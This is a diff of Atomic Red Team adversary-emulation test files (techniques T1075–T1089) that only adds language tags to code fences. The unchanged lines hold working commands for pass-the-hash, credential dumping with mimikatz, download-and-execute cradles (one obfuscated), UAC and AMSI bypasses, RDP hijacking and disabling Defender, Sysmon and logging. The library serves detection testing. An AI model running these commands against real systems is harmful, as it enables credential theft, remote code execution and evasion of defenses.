+9 -4
View File
@@ -29,7 +29,9 @@ Note: must dump hashes first
#### Attack Commands: Run with `command_prompt`!
```
```cmd
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
```
@@ -58,20 +60,23 @@ command execute with crackmapexec
#### Attack Commands: Run with `command_prompt`!
```
```cmd
crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
```
#### Dependencies: Run with `powershell`!
##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
##### Check Prereq Commands:
```
```powershell
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
```
##### Get Prereq Commands:
```
```powershell
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
```
atomics/T1076/T1076.md
+10 -5
View File
@@ -23,14 +23,16 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
```
#### Cleanup Commands:
```
```cmd
sc.exe delete sesshijack
```
@@ -55,20 +57,23 @@ Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonser
#### Attack Commands: Run with `powershell`!
```
```powershell
Connect-RDP -ComputerName #{logonserver} -User #{username}
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Joining this computer to a domain must be done manually
```
atomics/T1077/T1077.md
+12 -4
View File
@@ -35,7 +35,9 @@ Connecting To Remote Shares
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
@@ -62,7 +64,9 @@ Map Admin share utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
@@ -88,7 +92,9 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
psexec.exe #{remote_host} -c #{command_path}
```
@@ -115,7 +121,9 @@ This technique is used by post-exploitation frameworks.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
```
atomics/T1081/T1081.md
+12 -4
View File
@@ -29,7 +29,9 @@ In cloud environments, authenticated user credentials are often stored in local
#### Attack Commands: Run with `sh`!
```
```sh
python2 laZagne.py all
```
@@ -54,7 +56,9 @@ Extracting credentials from files
#### Attack Commands: Run with `sh`!
```
```sh
grep -ri password #{file_path}
```
@@ -74,7 +78,9 @@ Extracting Credentials from Files
#### Attack Commands: Run with `powershell`!
```
```powershell
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -Pattern password
```
@@ -95,7 +101,9 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
```
atomics/T1082/T1082.md
+24 -8
View File
@@ -51,7 +51,9 @@ Identify System Info
#### Attack Commands: Run with `command_prompt`!
```
```cmd
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
```
@@ -72,7 +74,9 @@ Identify System Info
#### Attack Commands: Run with `sh`!
```
```sh
systemsetup
system_profiler
ls -al /Applications
@@ -94,7 +98,9 @@ Identify System Info
#### Attack Commands: Run with `sh`!
```
```sh
uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
@@ -118,7 +124,9 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
#### Attack Commands: Run with `bash`!
```
```bash
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
@@ -145,7 +153,9 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
#### Attack Commands: Run with `bash`!
```
```bash
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
@@ -169,7 +179,9 @@ Identify system hostname for Windows.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
hostname
```
@@ -189,7 +201,9 @@ Identify system hostname for Linux and macOS systems.
#### Attack Commands: Run with `bash`!
```
```bash
hostname
```
@@ -209,7 +223,9 @@ Identify the Windows MachineGUID value for a system.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
```
atomics/T1083/T1083.md
+12 -4
View File
@@ -31,7 +31,9 @@ Find or discover files on the file system
#### Attack Commands: Run with `command_prompt`!
```
```cmd
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
@@ -58,7 +60,9 @@ Find or discover files on the file system
#### Attack Commands: Run with `powershell`!
```
```powershell
ls -recurse
get-childitem -recurse
gci -recurse
@@ -86,7 +90,9 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
#### Attack Commands: Run with `sh`!
```
```sh
ls -a > allcontents.txt
ls -la /Library/Preferences/ > detailedprefsinfo.txt
file */* *>> ../files.txt
@@ -112,7 +118,9 @@ Find or discover files on the file system
#### Attack Commands: Run with `sh`!
```
```sh
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
cat /etc/mtab > /tmp/loot.txt
find . -type f -iname *.pdf > /tmp/loot.txt
atomics/T1084/T1084.md
+4 -2
View File
@@ -25,7 +25,9 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
@@ -44,7 +46,7 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
```
#### Cleanup Commands:
```
```powershell
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
atomics/T1085/T1085.md
+30 -14
View File
@@ -36,7 +36,9 @@ Test execution of a remote script using rundll32.exe
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
```
@@ -63,7 +65,9 @@ Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
```
@@ -90,20 +94,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
```
#### Dependencies: Run with `powershell`!
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}"
```
@@ -129,20 +136,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
```
#### Dependencies: Run with `powershell`!
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}"
```
@@ -168,20 +178,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}
```
#### Dependencies: Run with `powershell`!
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
```
@@ -207,20 +220,23 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
#### Attack Commands: Run with `command_prompt`!
```
```cmd
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute}
```
#### Dependencies: Run with `powershell`!
##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
```
atomics/T1086/T1086.md
+47 -19
View File
@@ -56,7 +56,9 @@ Download Mimikatz and dump credentials
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
@@ -81,7 +83,9 @@ Download Bloodhound and run it
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
@@ -102,7 +106,9 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
#### Attack Commands: Run with `powershell`!
```
```powershell
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
@@ -124,7 +130,9 @@ Run mimikatz via PsSendKeys
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```
@@ -145,7 +153,9 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
#### Attack Commands: Run with `command_prompt`!
```
```cmd
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
```
@@ -173,7 +183,9 @@ Using PS 5.1, add a user via CLI
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
@@ -200,7 +212,9 @@ Not proxy aware removing cache although does not appear to write to those locati
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
@@ -227,7 +241,9 @@ Not proxy aware removing cache although does not appear to write to those locati
#### Attack Commands: Run with `command_prompt`!
```
```cmd
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
@@ -253,7 +269,9 @@ Powershell xml download request
#### Attack Commands: Run with `command_prompt`!
```
```cmd
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
@@ -279,7 +297,9 @@ Powershell invoke mshta to download payload
#### Attack Commands: Run with `powershell`!
```
```powershell
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
@@ -319,14 +339,16 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
#### Attack Commands: Run with `powershell`!
```
```powershell
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
#### Cleanup Commands:
```
```powershell
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
```
@@ -346,20 +368,23 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo
#### Attack Commands: Run with `powershell`!
```
```powershell
powershell.exe -version 2 -Command Write-Host $PSVersion
```
#### Dependencies: Run with `powershell`!
##### Description: PowerShell version 2 must be installed
##### Check Prereq Commands:
```
```powershell
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Automated installer not implemented yet, please install PowerShell v2 manually
```
@@ -382,26 +407,29 @@ Creates a file with an alternate data stream and simulates executing that hidden
#### Attack Commands: Run with `powershell`!
```
```powershell
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{ads_file} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Homedrive must be an NTFS drive
##### Check Prereq Commands:
```
```powershell
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
Write-Host Prereq's for this test cannot be met automatically
```
atomics/T1087/T1087.md
+33 -11
View File
@@ -64,7 +64,9 @@ Enumerate all accounts by copying /etc/passwd to another file
#### Attack Commands: Run with `sh`!
```
```sh
cat /etc/passwd > #{output_file}
```
@@ -89,7 +91,9 @@ cat /etc/passwd > #{output_file}
#### Attack Commands: Run with `sh`!
```
```sh
cat /etc/sudoers > #{output_file}
```
@@ -114,7 +118,9 @@ View accounts wtih UID 0
#### Attack Commands: Run with `sh`!
```
```sh
grep 'x:0:' /etc/passwd > #{output_file}
```
@@ -134,7 +140,9 @@ List opened files by user
#### Attack Commands: Run with `sh`!
```
```sh
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
@@ -159,7 +167,9 @@ Show if a user account has ever logged in remotely
#### Attack Commands: Run with `sh`!
```
```sh
lastlog > #{output_file}
```
@@ -179,7 +189,9 @@ Utilize groups and id to enumerate users and groups
#### Attack Commands: Run with `sh`!
```
```sh
groups
id
```
@@ -200,7 +212,9 @@ Utilize local utilities to enumerate users and groups
#### Attack Commands: Run with `sh`!
```
```sh
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
@@ -224,7 +238,9 @@ Enumerate all accounts
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net user
net user /domain
dir c:\Users\
@@ -249,7 +265,9 @@ Enumerate all accounts via PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
net user
net user /domain
get-localuser
@@ -279,7 +297,9 @@ Enumerate logged on users
#### Attack Commands: Run with `command_prompt`!
```
```cmd
query user
```
@@ -299,7 +319,9 @@ Enumerate logged on users via PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
query user
```
atomics/T1088/T1088.md
+24 -12
View File
@@ -40,13 +40,15 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
#### Attack Commands: Run with `command_prompt`!
```
```cmd
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
```
#### Cleanup Commands:
```
```cmd
reg.exe delete hkcu\software\classes\mscfile /f
```
@@ -70,14 +72,16 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
```
#### Cleanup Commands:
```
```powershell
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
```
@@ -101,14 +105,16 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo
#### Attack Commands: Run with `command_prompt`!
```
```cmd
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
```
#### Cleanup Commands:
```
```cmd
reg.exe delete hkcu\software\classes\ms-settings /f
```
@@ -132,7 +138,9 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
@@ -140,7 +148,7 @@ Start-Process "C:\Windows\System32\fodhelper.exe"
```
#### Cleanup Commands:
```
```powershell
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
```
@@ -164,7 +172,9 @@ PowerShell code to bypass User Account Control using ComputerDefaults.exe on Win
#### Attack Commands: Run with `powershell`!
```
```powershell
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
@@ -172,7 +182,7 @@ Start-Process "C:\Windows\System32\ComputerDefaults.exe"
```
#### Cleanup Commands:
```
```powershell
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
```
@@ -196,14 +206,16 @@ Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC by
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
mkdir "\\?\C:\Windows \System32\"
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
```
#### Cleanup Commands:
```
```cmd
rd "\\?\C:\Windows \" /S /Q
del "c:\testbypass.exe" >nul 2>nul
```
atomics/T1089/T1089.md
+79 -37
View File
@@ -55,7 +55,9 @@ Disables the iptables firewall
#### Attack Commands: Run with `sh`!
```
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service iptables stop
@@ -84,7 +86,9 @@ Disables syslog collection
#### Attack Commands: Run with `sh`!
```
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
@@ -111,7 +115,9 @@ Disable the Cb Response service
#### Attack Commands: Run with `sh`!
```
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
@@ -138,7 +144,9 @@ Disables SELinux enforcement
#### Attack Commands: Run with `sh`!
```
```sh
setenforce 0
```
@@ -158,7 +166,9 @@ Disables Carbon Black Response
#### Attack Commands: Run with `sh`!
```
```sh
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```
@@ -178,7 +188,9 @@ Disables LittleSnitch
#### Attack Commands: Run with `sh`!
```
```sh
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
@@ -198,7 +210,9 @@ Disables OpenDNS Umbrella
#### Attack Commands: Run with `sh`!
```
```sh
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
@@ -223,26 +237,29 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
fltmc.exe unload #{sysmon_driver}
```
#### Cleanup Commands:
```
```cmd
sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon
```
#### Dependencies: Run with `command_prompt`!
##### Description: Sysmon filter must be loaded
##### Check Prereq Commands:
```
```cmd
fltmc.exe filters | findstr #{sysmon_driver}
```
##### Get Prereq Commands:
```
```cmd
echo Automated installer not implemented yet, please install Sysmon manually
```
@@ -266,12 +283,14 @@ This action requires HTTP logging configurations in IIS to be unlocked.
#### Attack Commands: Run with `powershell`!
```
```powershell
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
#### Cleanup Commands:
```
```powershell
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
```
@@ -295,24 +314,27 @@ Uninstall Sysinternals Sysmon for Defense Evasion
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sysmon -u
```
#### Cleanup Commands:
```
```cmd
sysmon -i -accepteula
```
#### Dependencies: Run with `powershell`!
##### Description: Sysmon executable must be available
##### Check Prereq Commands:
```
```powershell
if(cmd /c where sysmon) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
@@ -321,11 +343,11 @@ if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
```
##### Description: Sysmon must be installed
##### Check Prereq Commands:
```
```powershell
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```
```powershell
cmd /c sysmon -i -accepteula
```
@@ -344,12 +366,14 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
#### Attack Commands: Run with `powershell`!
```
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
#### Cleanup Commands:
```
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```
@@ -369,12 +393,14 @@ This test removes the Windows Defender provider registry key.
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```
#### Cleanup Commands:
```
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
```
@@ -398,13 +424,15 @@ With administrative rights, an adversary can disable Windows Services related to
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
```
#### Cleanup Commands:
```
```cmd
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
```
@@ -426,7 +454,9 @@ Credit to Matt Graeber (@mattifestation) for the research.
#### Attack Commands: Run with `powershell`!
```
```powershell
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
@@ -434,7 +464,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging']
```
#### Cleanup Commands:
```
```powershell
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
@@ -458,7 +488,9 @@ Credit to Matt Graeber (@mattifestation) for the research.
#### Attack Commands: Run with `powershell`!
```
```powershell
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
@@ -478,7 +510,9 @@ Attempting to disable scheduled scanning and other parts of windows defender atp
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
@@ -486,7 +520,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 1
```
#### Cleanup Commands:
```
```powershell
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
